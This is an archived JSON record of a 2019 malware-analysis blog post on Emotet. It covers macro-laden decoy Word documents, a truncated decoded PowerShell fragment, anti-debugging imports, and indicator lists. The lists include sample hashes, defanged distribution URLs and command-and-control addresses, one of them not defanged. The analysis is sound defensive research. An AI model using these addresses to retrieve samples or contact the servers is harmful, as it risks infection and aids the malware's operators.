{
	"id": "948163f8-cf57-4a4e-a5d3-c75e0f56f10a",
	"created_at": "2026-04-06T00:07:50.966418Z",
	"updated_at": "2026-04-10T13:12:54.520017Z",
	"deleted_at": null,
	"sha1_hash": "4cac21552c2f27d8c0e44fa077604812035e91f0",
	"title": "Return of the mummy - welcome back, emotet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1267344,
	"plain_text": "Return of the mummy - welcome back, emotet\r\nBy f0wL\r\nPublished: 2019-09-24 · Archived: 2026-04-05 18:12:31 UTC\r\nTue 24 September 2019 in Banking-Malware\r\nOr to be more historically precise: Imhotep was the Egyptian, Emotet is the Malware strain we are going to take a\r\nLook at. Last week it returned from its summer vacation with a few new tricks\r\nA short disclaimer: downloading and running the samples linked below will compromise your computer and\r\ndata, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be\r\nillegal depending on where you live.\r\nEmotet Sample #1 @ Hybrid Analysis --\u003e sha256\r\n6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5\r\nEmotet Sample #2 @ Hybrid Analysis --\u003e sha256\r\n757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975\r\nEmotet brought home a few souveniers from summer trip as well. The image above and below show the two most\r\ncommon decoy header pictures that the distributed Maldocs use. To hide the malicious VBA code that hides under\r\nthe picture they used small textboxes that contain the embedded macro.\r\nAnyRun Analysis\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 1 of 9\n\nAs Researchers at MalwareBytes found out the malspammers are even trying to lure people into downloading the\r\ninfected Word Documents by advertising them as Edward Snowden's new Book \"Permanent Record\". Seems like\r\nthe criminals reached a new moralic low point.\r\nThe following two screenshots are excerpts of the report generated by OLETools on an Emotet Word Document.\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 2 of 9\n\nAfter decoding the Base64 String we get this command as a result:\r\n$solidstatePPV76='RhodeIslandB832';$turquoiseXDz48 = '844';$compressEq464='monitorcJX36';$PersistentW\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 3 of 9\n\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 4 of 9\n\nTaking a peek at the Imports we can see that the Malware uses (amongst other functions) TerminateProcess,\r\nIsDebuggerPresent and GetTimeZoneInfo imported from Kernel32.dll.\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 5 of 9\n\nFurthermore it also imports various functions like RegDeleteValueW to modify the registry from Advapi32.dll.\r\nIt uses the IsDebuggerPresent function out of debugapi.h to check if it is actively being debugged and will exit if\r\nit returns true.\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 6 of 9\n\nThe Any.Run Analysis of the second sample can be found here.\r\nLooks like we stumbled across a real Typography expert as well 😹\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 7 of 9\n\nSquirrel Shootout ?! Sounds like another attempt to frame / disguise as another executable.\r\nInteresting strings all around 🤔\r\nAnother quite interesting tool to unpack and analyze Emotet is tracecorn_tina, which is (as the name might\r\nalready suggest) based on tracecorn, a Windows API tracer for malware.\r\nIOCs\r\nEmotet (SHA256)\r\n6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5 (480 KiB)\r\n7080e1b236a19ed46ea28754916c43a7e8b68727c33cbf81b96077374f4dc205 (484 KiB)\r\n757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975 (201 KiB)\r\n.docm Files (SHA256)\r\nea7391b5dd01d2c79ebe16e842daacc84a0dc5f0174235bbae86b2204312a6ab --\u003e 5B99674D2005BB01760A1765E4CB3BD\r\ne3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 --\u003e 8KZLXW0QU5K8_NJC.docm\r\nc13a058b51294284b7383b5d5c78eff83529519c207376cf26e94f4e888c5114 --\u003e 9B797E5A9E5FB0789B8278134AF083A\r\nae63b306cc2787b2acac3770d706db0648f53e1fade14af0104cfcb07001e22d --\u003e ANHANG 3311 1519749319.doc\r\n82bb3612b299cba0350e1dc4c299af9d50354cc1448b1dd931017f4381d0606a --\u003e D468EA5BA7A856C12C3AC887C1A023F\r\n78d7b30a7a68c3b1da18bcf2ea84904907ecbd96d460b7d94871ac1a6ff21a35 --\u003e DETAILS_09_17_2019MW-33916.docm\r\nd88175cb5257df99953b2cfb65dff302dce425548c54706bf7d23ba6de5eef19 --\u003e DOC-16092019 6678523.doc\r\ncb4a203b541ec40e06c9d9f030dacf22747d62a771385d49d03801945b8d2e1a --\u003e FB1ADE20382673E3E1D3351FA315522\r\n1e1eedfe3066f398cdc0805ec5338e2028c0fd7085255c741d31ec35eb3bdbda --\u003e 7330786_09_23_2019_UIE76589.doc\r\nURLs\r\nhxxps://autorepuestosdml[.]com/wp-content/CiloXIptI/\r\nhxxps://pep-egypt[.]com/eedy/xx3yspke7_l7jp5-430067348/\r\nhxxps://danangluxury[.]com/wp-content/uploads/KTgQsblu/\r\nhxxps://www.gcesb[.]com/wp-includes/customize/zUfJervuM/\r\nhxxps://bondagetrip[.]com/wp-content/y0gm3xxs_hmnw8rq-764161699/\r\nhxxp://www.offmaxindia[.]com/wp-includes/b161/\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 8 of 9\n\nhxxp://www.kutrialiogludernegi[.]com/cgi-bin/6j1/\r\nhxxp://poshinternationalmedia[.]com/nqec/zcdvgy178/\r\nhxxp://drfalamaki[.]com/Mqm24/btxz33664/\r\nhxxps://gcsucai[.]com/wp-content/h891u8f8/\r\nContacted Servers\r\nhxxp://179.12.170[].]88:8080/vermont/json/ringin/\r\nhxxp://182.76.6[.]2:8080/sess/\r\nhxxp://86.98.25[.]30:53/ringin/attrib/ringin/\r\nhxxp://198.199.88[.]162:8080/sym/codec/ringin/\r\nhxxp://178.62.37[.]188:443/health/enabled/ringin/\r\nhxxp://92.222.125[.]16:7080/acquire/loadan/\r\nhxxp://45.79.188.67:8080/report/\r\nhxxp://45.79.188.67:8080/stubs/schema/ringin/\r\nhxxp://173.214.174[.]107:443/whoami.php\r\nhxxp://173.214.174[.]107:443/xian/vermont/ringin/merge/\r\nhxxp://173.214.174[.]107:443/symbols/enable/ringin/\r\nSource: https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html\r\nPage 9 of 9\n\nhttps://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html    \nThe Any.Run Analysis of the second sample can be found here.\nLooks like we stumbled across a real Typography expert as well\n  Page 7 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html"
	],
	"report_names": [
		"return-of-the-mummy-welcome-back-emotet.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434070,
	"ts_updated_at": 1775826774,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.pdf",
		"text": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.txt",
		"img": "https://archive.orkl.eu/4cac21552c2f27d8c0e44fa077604812035e91f0.jpg"
	}
}